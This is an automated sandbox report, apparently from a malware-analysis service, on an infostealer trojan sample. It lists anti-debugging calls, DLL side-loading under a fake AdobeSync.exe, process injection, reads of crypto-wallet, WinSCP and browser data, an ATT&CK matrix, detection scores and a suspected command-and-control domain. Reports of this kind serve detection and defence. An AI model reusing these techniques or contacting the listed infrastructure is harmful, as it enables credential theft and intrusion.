Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_00893C76 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00893C76
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_005EE3D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_005EE3D8
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_005EE88A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_005EE88A
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_005EE9DC SetUnhandledExceptionFilter,2_2_005EE9DC
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_005F3C76 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_005F3C76
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_6D370C6C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6D370C6C
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_6D373EDE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6D373EDE
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_6D3703FB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_6D3703FB
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeCode function: 3_2_0012762E IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,3_2_0012762E

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryValueKey: Direct from: 0x7FF70D5DA7D4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryInformationProcess: Direct from: 0x7FF70D5B25CFJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryInformationProcess: Direct from: 0x7FF70D5B1CB2Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryValueKey: Direct from: 0x14011D93EJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF70D6778C5Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtClose: Direct from: 0x7FF70D7254D1
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryInformationProcess: Direct from: 0x7FF70D675D05Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF70D722F76Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D67E136Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtEnumerateValueKey: Direct from: 0x7FF70D667C37Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtCreateFile: Direct from: 0x7FF70D72325DJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtClose: Indirect: 0x14012000F
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtTerminateProcess: Direct from: 0x7FF70D5BDDD8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D531ECFJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D68BF93Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D5D2253Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtOpenKeyEx: Direct from: 0x7FF70D5D97BDJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtCreateThreadEx: Direct from: 0x7FF70D5241F8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D67C1A6Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x14011D808Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D726770Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D5B8D09Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D5BA90DJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D52991DJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D570B0CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtSetInformationProcess: Direct from: 0x7FF70D5AD940Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtMapViewOfSection: Direct from: 0x7FF70D5A4EF6Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D62E8B9Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtMapViewOfSection: Direct from: 0x7FF70D5CE50BJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF70D67DCDBJump to behavior
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exeNtSetInformationThread: Direct from: 0x6D4E2240Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF70D677B98Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryInformationProcess: Direct from: 0x7FF70D5BF369Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtSetInformationProcess: Direct from: 0x7FF70D5ADD22Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF70D687244Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D52FD88Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D6871BCJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF70D6780A4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtSetInformationProcess: Direct from: 0x7FF70D677162Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D5C5002Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryValueKey: Direct from: 0x7FF70D5D9DFEJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D5B838AJump to behavior
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exeNtQuerySystemInformation: Direct from: 0x777563E1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D680B0DJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryInformationProcess: Direct from: 0x7FF70D676AA7Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FFB2CE826A1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D654901Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtDelayExecution: Direct from: 0x7FF70D6A12F9Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtDelayExecution: Direct from: 0x7FF70D6A26F0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D52B119Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D523E52Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtCreateFile: Direct from: 0x7FF70D5B8C13Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D65135DJump to behavior
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeNtProtectVirtualMemory: Direct from: 0x77757B2EJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D52C9FFJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtClose: Direct from: 0x7FF70D5BFBFD
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtClose: Direct from: 0x14011D864
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryInformationProcess: Direct from: 0x7FF70D630DADJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtClose: Direct from: 0x7FF70D7279C3
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryVolumeInformationFile: Direct from: 0x7FF70D5C7ED6Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D699ED7Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryValueKey: Direct from: 0x7FF70D5DAAD6Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtMapViewOfSection: Direct from: 0x7FF70D5A4E3AJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF70D67DC50Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtSetInformationProcess: Direct from: 0x7FF70D676C69Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtSetInformationProcess: Direct from: 0x7FF70D5BF270Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtDeviceIoControlFile: Direct from: 0x7FF70D63B277Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtDeviceIoControlFile: Direct from: 0x7FF70D5B82AAJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtSetInformationThread: Direct from: 0x7FF70D7309E4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtClose: Direct from: 0x7FF70D7279D7
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D6833DCJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D6850CBJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FFB2CEA4B5EJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtSetInformationProcess: Direct from: 0x7FF70D6D81ECJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtSetInformationProcess: Direct from: 0x7FF70D5C02F7Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D68E1F4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryValueKey: Direct from: 0x7FF70D5D9EEDJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtCreateFile: Direct from: 0x7FF70D7254B3Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtClose: Direct from: 0x7FF70D7279E5
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadFile: Direct from: 0x14011D832Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D53187AJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtDelayExecution: Direct from: 0x7FF70D69DB35Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtDelayExecution: Direct from: 0x7FF70D6AB31AJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D5D03E6Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF70D5B7F4BJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtMapViewOfSection: Direct from: 0x7FF70D726342Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryInformationProcess: Direct from: 0x7FF70D5BF9FFJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe NtAllocateVirtualMemory: Direct from: 0x7FF70D609090
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe NtCreateThreadEx: Direct from: 0x7FF70D523FB7
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe NtCreateFile: Direct from: 0x14011D7A4
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe NtReadFile: Direct from: 0x7FF70D5B8D66
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe NtCreateThreadEx: Direct from: 0x7FF70D6D6783
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe NtAllocateVirtualMemory: Direct from: 0x7FF70D539E98
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe NtAllocateVirtualMemory: Direct from: 0x7FF70D52F9FD
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe NtAllocateVirtualMemory: Direct from: 0x7FF70D5C7185
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe NtAllocateVirtualMemory: Direct from: 0x7FF70D606678
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe NtAllocateVirtualMemory: Direct from: 0x7FF70D5D0C30
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe NtAllocateVirtualMemory: Direct from: 0x7FF70D5D6EED
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe NtAllocateVirtualMemory: Direct from: 0x140120A3C
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe NtAllocateVirtualMemory: Direct from: 0x7FF70D5CB96C
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe NtReadVirtualMemory: Direct from: 0x7FF70D67DACF
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe protection: read write
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe protection: read write
Source: C:\Windows\SysWOW64\cmd.exe Memory written: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe base: 14011BC08
Source: C:\Windows\SysWOW64\cmd.exe Memory written: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe base: 227010
Source: C:\Windows\SysWOW64\cmd.exe Memory written: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe base: 14011BC08
Source: C:\Windows\SysWOW64\cmd.exe Memory written: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe base: 3AC010
Source: C:\Users\user\Desktop\LVkAi4PBv6.exe Process created: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe "C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe" -burn.clean.room="C:\Users\user\Desktop\LVkAi4PBv6.exe" -burn.filehandle.attached=528 -burn.filehandle.self=552
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user~1\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user~1\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Source: C:\Users\user\Desktop\LVkAi4PBv6.exe Code function: 0_2_008A1719 InitializeSecurityDescriptor,GetLastError,CreateWellKnownSid,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,SetEntriesInAclA,SetSecurityDescriptorOwner,GetLastError,SetSecurityDescriptorGroup,GetLastError,SetSecurityDescriptorDacl,GetLastError,CoInitializeSecurity,LocalFree,0_2_008A1719
Source: C:\Users\user\Desktop\LVkAi4PBv6.exe Code function: 0_2_008A3A5F AllocateAndInitializeSid,CheckTokenMembership,0_2_008A3A5F
Source: AdobeSync.exe, 00000003.00000002.1393381948.0000000008473000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.0000000008072000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.00000000049CD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: )[%d] Shell_TrayWndTrayNotifyWnd
Source: C:\Users\user\Desktop\LVkAi4PBv6.exe Code function: 0_2_0088EC07 cpuid 0_2_0088EC07
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\LVkAi4PBv6.exe Code function: 0_2_00874EDF ConvertStringSecurityDescriptorToSecurityDescriptorW,GetLastError,CreateNamedPipeW,GetLastError,CreateNamedPipeW,GetLastError,CloseHandle,LocalFree,0_2_00874EDF
Source: C:\Users\user\Desktop\LVkAi4PBv6.exe Code function: 0_2_0089FEC6 EnterCriticalSection,GetCurrentProcessId,GetCurrentThreadId,GetLocalTime,LeaveCriticalSection,0_2_0089FEC6
Source: C:\Users\user\Desktop\LVkAi4PBv6.exe Code function: 0_2_008661DF GetUserNameW,GetLastError,0_2_008661DF
Source: C:\Users\user\Desktop\LVkAi4PBv6.exe Code function: 0_2_008A887B GetTimeZoneInformation,SystemTimeToTzSpecificLocalTime,0_2_008A887B
Source: C:\Users\user\Desktop\LVkAi4PBv6.exe Code function: 0_2_00865195 GetModuleHandleW,CoInitializeEx,GetVersionExW,GetLastError,CoUninitialize,0_2_00865195
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Key opened: HKEY_CURRENT_USER\Software\monero-project\monero-core
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2 Override
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\y572q81e.default
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Directory queried: C:\Users\user\Documents
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 3 Native API | 11 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | 1 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 12 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 3 Command and Scripting Interpreter | 1 Windows Service | 11 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | 1 Credentials in Registry | 1 Account Discovery | Remote Desktop Protocol | 11 Data from Local System | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 Service Execution | Logon Script (Windows) | 1 Access Token Manipulation | 3 Obfuscated Files or Information | Security Account Manager | 13 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 Windows Service | 1 Software Packing | NTDS | 137 System Information Discovery | Distributed Component Object Model | Input Capture | 14 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 213 Process Injection | 11 DLL Side-Loading | LSA Secrets | 231 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 File Deletion | Cached Domain Credentials | 3 Process Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 21 Masquerading | DCSync | 11 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 11 Virtualization/Sandbox Evasion | Proc Filesystem | 1 System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Access Token Manipulation | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 213 Process Injection | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
[Behavior Graph ID: 1585283, Sample: LVkAi4PBv6.exe, Startdate: 07/01/2025, Architecture: WINDOWS, Score: 100]

Source | Detection | Scanner | Label
LVkAi4PBv6.exe | 24% | ReversingLabs | Win32.Trojan.Rugmi

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PatchReaderWCF\AXE8SharedExpat.dll | 30% | ReversingLabs | Win32.Trojan.Generic
C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PatchReaderWCF\BIB.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PatchReaderWCF\msvcp90.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PatchReaderWCF\msvcr90.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\PatchReaderWCF\sqlite.dll | 0% | ReversingLabs |
C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AXE8SharedExpat.dll | 30% | ReversingLabs | Win32.Trojan.Generic
C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe | 0% | ReversingLabs |
C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\BIB.dll | 0% | ReversingLabs |
C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\Quadruple.dll | 0% | ReversingLabs |
C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\msvcp90.dll | 0% | ReversingLabs |
C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\msvcr90.dll | 0% | ReversingLabs |
C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\sqlite.dll | 0% | ReversingLabs |
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
https://tataragirld.site/?3d | 0% | Avira URL Cloud | safe
http://www.softwareok.de/?seite=faq-Find.Same.Images.OK&faq=0 | 0% | Avira URL Cloud | safe
http://www.softwareok.de/?Download=Find.Same.Images.OK | 0% | Avira URL Cloud | safe
https://tataragirld.site/2009_New_England_Patriots_season | 0% | Avira URL Cloud | safe
http://www.softwareok.de/?Freeware/Find.Same.Images.OK/History | 0% | Avira URL Cloud | safe
https://tataragirld.site/2009_New_England_Patriots_seasono | 0% | Avira URL Cloud | safe
http://www.softwareok.de | 0% | Avira URL Cloud | safe
https://tataragirld.site/ | 0% | Avira URL Cloud | safe
https://ntp.msn.comAccess-Control-Allow-Credentials: | 0% | Avira URL Cloud | safe
https://tataragirld.site/g3 | 0% | Avira URL Cloud | safe
https://ntp.msn.comcache-control:public | 0% | Avira URL Cloud | safe
https://sn.com | 100% | Avira URL Cloud | malware
http://www.softwareok.de/?Freeware/Find.Same.Images.OK | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
chrome.cloudflare-dns.com | 172.64.41.3 | true | false | | high
ssl.bingadsedgeextension-prod-europe.azurewebsites.net | 94.245.104.56 | true | false | | high
sb.scorecardresearch.com | 18.244.18.32 | true | false | | high
tataragirld.site | 188.114.97.3 | true | false | | unknown
